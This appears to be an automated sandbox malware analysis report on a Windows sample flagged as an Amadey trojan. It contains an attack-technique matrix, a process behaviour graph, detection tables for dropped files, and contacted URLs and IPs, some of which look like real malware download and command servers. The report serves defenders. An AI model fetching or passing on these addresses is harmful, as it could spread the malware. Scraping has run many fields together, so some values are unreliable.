                        Install Root Certificate                        		LSA Secrets971
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                        Process Injection                        		2
                        Software Packing                        		Cached Domain Credentials361
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                        Scheduled Task/Job                        		1
                        DLL Side-Loading                        		DCSync3
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
                        Registry Run Keys / Startup Folder                        		1
                        Bypass User Account Control                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        File Deletion                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
                        Masquerading                        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd361
                        Virtualization/Sandbox Evasion                        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                        Access Token Manipulation                        		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                        Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers412
                        Process Injection                        		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1430552 Sample: file.exe Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 154 Found malware configuration 2->154 156 Malicious sample detected (through community Yara rule) 2->156 158 Antivirus detection for dropped file 2->158 160 15 other signatures 2->160 12 file.exe 1 2->12         started        15 cmd.exe 2->15         started        17 koEMGMU.exe 2->17         started        20 3 other processes 2->20 process3 file4 196 Writes to foreign memory regions 12->196 198 Allocates memory in foreign processes 12->198 200 Sample uses process hollowing technique 12->200 202 Injects a PE file into a foreign processes 12->202 22 AddInProcess32.exe 15 405 12->22         started        27 conhost.exe 12->27         started        29 H6XhhPCeuwAb2QQK3C3B1Lwl.exe 15->29         started        31 conhost.exe 15->31         started        78 C:\Windows\Temp\...\JUnCNhn.exe, PE32 17->78 dropped signatures5 process6 dnsIp7 142 107.167.110.211 OPERASOFTWAREUS United States 22->142 144 107.167.110.216 OPERASOFTWAREUS United States 22->144 146 13 other IPs or domains 22->146 116 C:\Users\...\zWhvfqZrtT7TUoWor4gRArPv.exe, PE32 22->116 dropped 118 C:\Users\...\zUOgRazdYnb35XHU4UIsV9Yc.exe, PE32 22->118 dropped 120 C:\Users\...\zFZkiprzkq8Ae7mkklwscu5a.exe, MS-DOS 22->120 dropped 126 246 other malicious files 22->126 dropped 184 Installs new ROOT certificates 22->184 186 Drops script or batch files to the startup folder 22->186 188 Creates HTML files with .exe extension (expired dropper behavior) 22->188 190 Writes many files with high entropy 22->190 33 9wqoiPpK0NIQEBygxfm6h42G.exe 22->33         started        38 VtmtVe55Jwcf3rOGIU1yezyh.exe 1 4 22->38         started        40 i7gUU3MlvTwbsK8r3hAjzW0p.exe 22->40         started        42 16 other processes 22->42 122 C:\Users\user\AppData\Local\Temp\u2r8.1.exe, PE32 29->122 dropped 124 C:\Users\user\AppData\Local\Temp\u2r8.0.exe, PE32 29->124 dropped 192 Detected unpacking (changes PE section rights) 29->192 194 Detected unpacking (overwrites its own PE header) 29->194 file8 signatures9 process10 dnsIp11 128 87.240.137.164 VKONTAKTE-SPB-AShttpvkcomRU Russian Federation 33->128 130 95.142.206.0 VKONTAKTE-SPB-AShttpvkcomRU Russian Federation 33->130 136 18 other IPs or domains 33->136 80 C:\Users\...\urA10ZckYEEXLZZov5c00RO_.exe, PE32 33->80 dropped 82 C:\Users\...\s2mORnBj3q8nWakBtFzD2977.exe, PE32 33->82 dropped 84 C:\Users\...\Zsk2cFkeBC4UsceqkHvvw1iU.exe, PE32 33->84 dropped 90 22 other malicious files 33->90 dropped 162 Query firmware table information (likely to detect VMs) 33->162 164 Drops PE files to the document folder of the user 33->164 166 Creates HTML files with .exe extension (expired dropper behavior) 33->166 180 8 other signatures 33->180 44 F0mqqGl9pK9gdOm2cnZsC1mR.exe 33->44         started        47 UWxz0MPLJemfxFfuxrp6E5vU.exe 33->47         started        138 3 other IPs or domains 38->138 92 3 other malicious files 38->92 dropped 168 Detected unpacking (changes PE section rights) 38->168 170 Detected unpacking (overwrites its own PE header) 38->170 50 u5v8.0.exe 38->50         started        53 Qg_Appv5.exe 38->53         started        94 4 other malicious files 40->94 dropped 55 Install.exe 40->55         started        132 107.167.110.218 OPERASOFTWAREUS United States 42->132 134 107.167.125.189 OPERASOFTWAREUS United States 42->134 140 2 other IPs or domains 42->140 86 C:\Users\user\AppData\Local\Temp\u69w.1.exe, PE32 42->86 dropped 88 C:\Users\user\AppData\Local\Temp\u69w.0.exe, PE32 42->88 dropped 96 20 other malicious files 42->96 dropped 172 Found Tor onion address 42->172 174 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 42->174 176 Writes many files with high entropy 42->176 178 Found direct / indirect Syscall (likely to bypass EDR) 42->178 57 u69w.0.exe 42->57         started        59 u69w.1.exe 42->59         started        61 u4dc.0.exe 42->61         started        file12 signatures13 process14 dnsIp15 204 Query firmware table information (likely to detect VMs) 44->204 206 Tries to detect sandboxes and other dynamic analysis tools (window names) 44->206 208 Disables Windows Defender (deletes autostart) 44->208 226 7 other signatures 44->226 148 193.233.132.253 FREE-NET-ASFREEnetEU Russian Federation 47->148 150 172.67.75.166 CLOUDFLARENETUS United States 47->150 210 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 47->210 152 185.172.128.76 NADYMSS-ASRU Russian Federation 50->152 98 C:\Users\user\AppData\...\softokn3[1].dll, PE32 50->98 dropped 100 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 50->100 dropped 102 C:\Users\user\AppData\...\mozglue[1].dll, PE32 50->102 dropped 114 9 other files (5 malicious) 50->114 dropped 212 Tries to steal Mail credentials (via file / registry access) 50->212 214 Tries to harvest and steal ftp login credentials 50->214 216 Tries to harvest and steal browser information (history, passwords, etc) 50->216 228 2 other signatures 50->228 104 C:\Users\user\AppData\Local\...\relay.dll, PE32 53->104 dropped 106 C:\Users\user\...\UniversalInstaller.exe, PE32 53->106 dropped 108 C:\Users\user\AppData\...\UIxMarketPlugin.dll, PE32 53->108 dropped 110 C:\Users\user\AppData\Local\Temp\ff086fda, PNG 53->110 dropped 218 Writes many files with high entropy 53->218 220 Found direct / indirect Syscall (likely to bypass EDR) 53->220 112 C:\Users\user\AppData\Local\...\koEMGMU.exe, PE32 55->112 dropped 222 Uses schtasks.exe or at.exe to add and modify task schedules 55->222 63 forfiles.exe 55->63         started        65 schtasks.exe 55->65         started        224 Checks if the current machine is a virtual machine (disk enumeration) 59->224 file16 signatures17 process18 process19 67 cmd.exe 63->67         started        70 conhost.exe 63->70         started        72 conhost.exe 65->72         started        signatures20 182 Suspicious powershell command line found 67->182 74 powershell.exe 67->74         started        process21 process22 76 WMIC.exe 74->76         started       

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        file.exe58%ReversingLabsWin64.Trojan.Amadey

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exe100%AviraHEUR/AGEN.1313019
                        C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exe100%AviraHEUR/AGEN.1313019
                        C:\Users\user\AppData\Local\0yHxI2NgcVq897URfu1bGLCU.exe100%AviraHEUR/AGEN.1313019
                        C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exe100%AviraHEUR/AGEN.1313019
                        C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exe100%AviraHEUR/AGEN.1313019
                        C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\0yHxI2NgcVq897URfu1bGLCU.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\8Hs13Qx2L9GIxFG02dQv6hVO.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\BCSbmKJiX30BH99M4SeS6WhT.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exe100%Joe Sandbox ML
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\4H9gwSn9hsmr1uT7Ln1OMxxi.exe16%ReversingLabsWin64.Trojan.Midie
                        C:\Users\user\AppData\Local\4atMces8tYoo96OnbLT8HE6O.exe16%ReversingLabsWin64.Trojan.Midie
                        C:\Users\user\AppData\Local\8FauF1Ec16N4pbn45vApMB9Y.exe16%ReversingLabsWin64.Trojan.Midie
                        C:\Users\user\AppData\Local\F9a5CAWDzjn4KX6pZMk93eNG.exe75%ReversingLabsWin32.Trojan.Operaloader
                        C:\Users\user\AppData\Local\H9xPrDydeyqRWbh69y5tSjbf.exe16%ReversingLabsWin64.Trojan.Midie
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Default12_my[1].exe22%ReversingLabsWin32.Trojan.Znyonm
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\Space_my[1].exe24%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\123p[1].exe88%ReversingLabsWin64.Trojan.Privateloader
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\Retailer_prog[1].exe30%ReversingLabsWin32.Trojan.Privateloader
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\freebl3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\msvcp140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nss3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\vcruntime140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\NdBfL9GQKAuQALK03ZlcLnBv.exe75%ReversingLabsWin32.Trojan.Operaloader
                        C:\Users\user\AppData\Local\OFQ7ZJkbPO93pwjUuJw87q34.exe16%ReversingLabsWin64.Trojan.Midie
                        C:\Users\user\AppData\Local\Pb9nMKWmPyxCQFZJxeJuCUeo.exe16%ReversingLabsWin64.Trojan.Midie
                        C:\Users\user\AppData\Local\ShiCqBALVwHXuLXc8u9Hf2su.exe16%ReversingLabsWin64.Trojan.Midie

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://185.172.128.76/3cd2b41cbde8fc9c.phptrue

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabu5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmpfalse
                            https://duckduckgo.com/ac/?q=u5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmpfalse
                              http://5.42.66.10/download/123p.exe3W9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpfalse
                                http://www.vmware.com/0Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  http://5.42.66.10/download/th/retail.phphp9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpfalse
                                      http://togaterecutirenics.sbs/09wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002AF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exek9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          http://invalidlog.txtlookupPA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpfalse
                                            http://wikkt.com/forum/index.php3su9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1488155637.0000000004165000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480209801.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479436217.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484968628.0000000004164000.00000004.00000020.00020000.00000000.sdmpfalse
                                              https://togaterecutirenics.sbs/rt9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B18000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1453908557.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1453988094.000000000417E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480209801.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479436217.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484968628.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1449962557.000000000417F000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exet9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  http://www.indyproject.org/VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpfalse
                                                    https://vk.com/doc5294803_668776833?hash=0O6PF91bZH66jRdVdr0Yhs0vV73FDPMFrSckqwaaZuH&dl=PH90vp0b08Gc9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.0000000004114000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      https://carthewasher.net/EQ9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        https://vk.com:80/doc5294803_668862025?hash=rZAtNKZ8jzd7e9UKuB7jZZstkXZGEcmTXg0oxAzukh8&dl=bnAa6o9El9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          https://zanzibarpivo.com/9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            https://vk.com:80/doc5294803_668907894?hash=eTJ5SXFgNlVQn3fSuayzbK2uQj2QDtrGinGQ1gFeZF8&dl=85Q0IzWrQ9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://vk.com/doc5294803_668900186?hash=FpdDjHFtSx5c0WPZoJe3fUQ5LwI9qJk1fUTDbMELBQ8&dl=XG2RO9fdQ1T99wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                https://vk.com/69wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  http://wikkt.com/forum/index.php9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484968628.0000000004164000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    http://5.42.66.10/download/th/space.php=W9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      http://5.42.66.10/download/th/getimage12.phpAV9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
